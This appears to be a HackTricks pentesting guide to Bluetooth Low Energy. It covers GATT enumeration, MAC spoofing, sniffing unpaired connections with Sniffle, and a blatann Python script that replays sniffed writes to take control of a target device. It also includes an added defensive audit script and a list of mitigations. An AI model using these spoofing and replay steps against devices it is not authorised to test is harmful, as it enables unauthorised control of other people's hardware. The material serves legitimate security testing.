# Pentesting BLE - Bluetooth Low Energy

{{#include ../../banners/hacktricks-training.md}}

## Introduction

Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range from 2400 to 2483.5 MHz. By contrast, classic Bluetooth uses 79 channels in the same range.

BLE devices communicate by sending **advertising packets** (**beacons**); these packets broadcast the existence of the BLE device to other devices nearby. These beacons sometimes also **send data**.

The listening device, also called the central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet, with additional information that did not fit into the initial advertising request, such as the full device name.

![](<../../images/image (152).png>)

The preamble byte synchronises the frequency, while the four-byte access address is the **connection identifier**, used in scenarios where several devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several PDU types; the most commonly used are ADV_NONCONN_IND and ADV_IND. Devices use the **ADV_NONCONN_IND** PDU type if they **do not accept connections**, transmitting data only in the advertising packet. Devices use **ADV_IND** if they **allow connections**, and they **stop sending advertising** packets once a **connection** has been **established**.

### GATT

The Generic Attribute Profile (GATT) defines how a device should format and transfer data. When analysing the attack surface of a BLE device, you will often focus on GATT (or GATTs), because it is how device functionality is triggered and how data is stored, grouped and modified. GATT lists a device's characteristics, descriptors and services in a table as 16- or 32-bit values. A characteristic is a data value sent between the central device and the peripheral device.
These characteristics can have descriptors that provide additional information about them. Characteristics are often grouped into services if they are related to performing a particular action.

## Enumeration

```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```

### GATTool

**GATTool** makes it possible to **establish** a **connection** with another device, list its **characteristics**, and read and write its attributes.\
GATTTool can launch an interactive shell with the `-I` option:

```bash
gatttool -i hci0 -I
[                 ][LE]> connect 24:62:AB:B1:A8:3E
Attempting to connect to A4:CF:12:6C:B3:76
Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]

# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)

# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16

# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```

### Bettercap

```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```

## Sniffing and actively controlling unpaired BLE devices

Many cheap BLE peripherals do not enforce pairing/bonding. Without bonding, Link Layer encryption is never enabled, so ATT/GATT traffic is sent in cleartext.
An off-path sniffer can follow the connection, decode the GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.

### Sniffing with Sniffle (CC26x2/CC1352)

Hardware: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group's Sniffle firmware.

Install Sniffle and its Wireshark extcap on Linux:

```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
  echo "[+] - Sniffle not installed! Installing at 1.10.0..."
  sudo mkdir -p /opt/sniffle
  sudo chown -R $USER:$USER /opt/sniffle
  pushd /opt/sniffle
  wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
  tar xvf v1.10.0.tar.gz
  # Install Wireshark extcap for user and root only
  mkdir -p $HOME/.local/lib/wireshark/extcap
  ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
  sudo mkdir -p /root/.local/lib/wireshark/extcap
  sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
  popd
else
  echo "[+] - Sniffle already installed at 1.10.0"
fi
```

Flash the Sonoff with the Sniffle firmware (make sure your serial device matches, e.g. /dev/ttyUSB0):

```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```

Capture in Wireshark via the Sniffle extcap and pivot quickly to state-changing writes by filtering:

```text
_ws.col.info contains "Sent Write Command"
```

This highlights ATT Write Commands from the client; the handle and value often map directly to device actions (e.g. a write of 0x01 to a buzzer/alert characteristic, 0x00 to stop it).
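The same check done offline, as an added example that is not part of the original page or of Sniffle: a minimal ATT decoder that walks a captured session and reports every handle written without Link Layer encryption, which is the audit you want when verifying whether a peripheral exposes unauthenticated writable characteristics. The ATT frames are constructed by hand, and the `encrypted` flag stands in for the sniffer's knowledge of whether encryption was enabled on the link.

```python
from collections import defaultdict
import struct

# ATT opcodes (Bluetooth Core Spec, Vol 3, Part F). Write Command (0x52)
# gets no response and carries no authentication, so it is the one an
# unpaired peripheral accepts blindly.
ATT_OPCODES = {
    0x0A: "Read Request", 0x0B: "Read Response",
    0x12: "Write Request", 0x13: "Write Response",
    0x52: "Write Command", 0x1B: "Handle Value Notification",
}
HANDLE_BEARING = {0x0A, 0x12, 0x52, 0x1B}   # opcode, then LE 16-bit handle
WRITE_OPS = {0x12, 0x52}

def parse_att(pdu: bytes) -> dict:
    """Split one ATT PDU into opcode name, handle (if any) and value bytes."""
    if not pdu:
        raise ValueError("empty ATT PDU")
    opcode = pdu[0]
    name = ATT_OPCODES.get(opcode, f"Unknown(0x{opcode:02x})")
    if opcode in HANDLE_BEARING:
        if len(pdu) < 3:
            raise ValueError(f"{name} too short for a handle: {pdu.hex()}")
        (handle,) = struct.unpack_from("<H", pdu, 1)
        return {"opcode": opcode, "name": name, "handle": handle, "value": pdu[3:]}
    return {"opcode": opcode, "name": name, "handle": None, "value": pdu[1:]}

def audit_writes(frames):
    """frames: iterable of (encrypted: bool, att_pdu: bytes) in capture order.
    Returns handle -> list of hex values for every write sent in cleartext."""
    exposed = defaultdict(list)
    for encrypted, pdu in frames:
        att = parse_att(pdu)
        if att["opcode"] in WRITE_OPS and not encrypted:
            exposed[att["handle"]].append(att["value"].hex())
    return dict(exposed)

# Constructed sample session: a client toggles an alert characteristic at
# handle 0x000b over an unencrypted link, reads the name at 0x0016, and one
# later write happens after encryption was enabled (so it is not exposed).
SAMPLE_FRAMES = [
    (False, bytes.fromhex("52 0b00 01")),            # Write Command 0x000b <- 01
    (False, bytes.fromhex("52 0b00 00")),            # Write Command 0x000b <- 00
    (False, bytes.fromhex("0a 1600")),               # Read Request 0x0016
    (False, bytes.fromhex("0b 5465737444657669")),   # Read Response "TestDevi"
    (True,  bytes.fromhex("12 2e00 04dc54d9")),      # Write Request, encrypted link
]

if __name__ == "__main__":
    for handle, values in audit_writes(SAMPLE_FRAMES).items():
        print(f"handle 0x{handle:04x} written in cleartext with values {values}")
```

Any handle that shows up in the report is one the device accepts without pairing; that is the list to compare against the GATT permissions the firmware is supposed to enforce.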
Sniffle CLI quick examples:

```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```

Alternative sniffer: Nordic's nRF Sniffer for BLE plus its Wireshark plugin also works. On small/cheap Nordic dongles you usually overwrite the USB bootloader to load the sniffer firmware, so either keep a dedicated sniffer dongle or you will need a J-Link/JTAG to restore the bootloader later.

### Active control via GATT

Once you have identified the writable characteristic handle and value from the sniffed traffic, connect as any central and send the same write:

- With Nordic nRF Connect for Desktop (BLE app):
  - Select the nRF52/nRF52840 dongle, scan and connect to the target.
  - Browse the GATT database and find the target characteristic (it often has a friendly name, e.g. Alert Level).
  - Perform a Write with the sniffed bytes (e.g. 01 to trigger, 00 to stop).
- Automate on Windows with a Nordic dongle using Python + blatann:

```python
import time
import blatann

# CONFIG
COM_PORT = "COM29"  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()

print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
    print("[!] Connection failed.")
    ble_device.close()
    raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
    for ch in service.characteristics:
        if ch.handle == 0x000b:  # Replace with your handle
            print("[!] Beeping.")
            ch.write(b"\x01")
            time.sleep(2)
            print("[+] And relax.")
            ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```

### Operational notes and mitigations

- Sonoff+Sniffle on Linux is recommended for reliable channel hopping and connection following. Keep a Nordic sniffer as a backup.
- Without pairing/bonding, any nearby attacker can observe writes and replay or craft their own to unauthenticated writable characteristics.
- Mitigations: require pairing/bonding and enforce encryption; set characteristic permissions to require authenticated writes; minimise unauthenticated writable characteristics; verify the GATT ACLs with Sniffle/nRF Connect.

## References

- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)

{{#include ../../banners/hacktricks-training.md}}